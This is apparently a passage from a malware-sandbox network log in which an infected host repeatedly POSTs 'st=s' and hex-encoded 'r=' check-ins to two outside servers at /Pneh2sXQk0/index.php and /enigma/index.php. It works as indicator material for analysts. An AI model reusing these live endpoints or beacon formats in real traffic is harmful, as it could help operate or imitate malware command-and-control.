                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1386 | 192.168.2.5 | 51241 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:20.510063887 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:20.757633924 CEST  196                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1387        192.168.2.5  51242        193.233.132.167  80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:36:20.842156887 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:36:21.093945026 CEST  197                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1388        192.168.2.5  51243        193.233.132.56   80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:36:21.083071947 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:36:21.326636076 CEST  219                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1389        192.168.2.5  51244        193.233.132.167  80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:36:21.344871044 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:21.596725941 CEST  196                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1390        192.168.2.5  51245        193.233.132.56   80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:36:21.575195074 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:21.825201035 CEST  196                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1391        192.168.2.5  51246        193.233.132.167  80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:36:21.949048042 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:36:22.200265884 CEST  197                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1392        192.168.2.5  51247        193.233.132.56   80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:36:22.170573950 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:36:22.420720100 CEST  219                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID: 1393 | Source IP: 192.168.2.5 | Source Port: 51248 | Destination IP: 193.233.132.167 | Destination Port: 80
Timestamp: Apr 19, 2024 03:36:22.456633091 CEST | Bytes transferred: 309 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Timestamp: Apr 19, 2024 03:36:22.711802006 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1394 | Source IP: 192.168.2.5 | Source Port: 51249 | Destination IP: 193.233.132.56 | Destination Port: 80
Timestamp: Apr 19, 2024 03:36:22.675677061 CEST | Bytes transferred: 312 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:36:22.929649115 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1395 | Source IP: 192.168.2.5 | Source Port: 51250 | Destination IP: 193.233.132.167 | Destination Port: 80
Timestamp: Apr 19, 2024 03:36:23.057893038 CEST | Bytes transferred: 155 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:36:23.306097031 CEST | Bytes transferred: 197 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 1396 | Source IP: 192.168.2.5 | Source Port: 51251 | Destination IP: 193.233.132.56 | Destination Port: 80
Timestamp: Apr 19, 2024 03:36:23.262765884 CEST | Bytes transferred: 158 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:36:23.512794018 CEST | Bytes transferred: 219 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 1397 | Source IP: 192.168.2.5 | Source Port: 51252 | Destination IP: 193.233.132.167 | Destination Port: 80
Timestamp: Apr 19, 2024 03:36:23.554732084 CEST | Bytes transferred: 309 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Timestamp: Apr 19, 2024 03:36:23.803133011 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1398 | Source IP: 192.168.2.5 | Source Port: 51253 | Destination IP: 193.233.132.56 | Destination Port: 80
Timestamp: Apr 19, 2024 03:36:23.771411896 CEST | Bytes transferred: 312 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:36:24.027760983 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1399        192.168.2.5  51254        193.233.132.167  80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:36:24.149641037 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:24.397629023 CEST  197                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1400        192.168.2.5  51255        193.233.132.56   80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:36:24.362396955 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:24.605443001 CEST  219                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1401        192.168.2.5  51256        193.233.132.167  80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:36:24.653465033 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:24.910254955 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1402        192.168.2.5  51257        193.233.132.56   80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:36:24.856856108 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:25.106906891 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
1403        192.168.2.5  51258        193.233.132.167  80                2956  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:36:25.243098021 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:25.488406897 CEST  197                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1404        192.168.2.5  51259        193.233.132.56   80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:36:25.448409081 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:25.697608948 CEST  219                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1405        192.168.2.5  51260        193.233.132.167  80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:36:25.743052006 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:25.996663094 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1406 | 192.168.2.5 | 51261 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:25.946080923 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:26.195178986 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1407 | 192.168.2.5 | 51262 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:26.340588093 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:26.592338085 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1408 | 192.168.2.5 | 51263 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:26.522227049 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
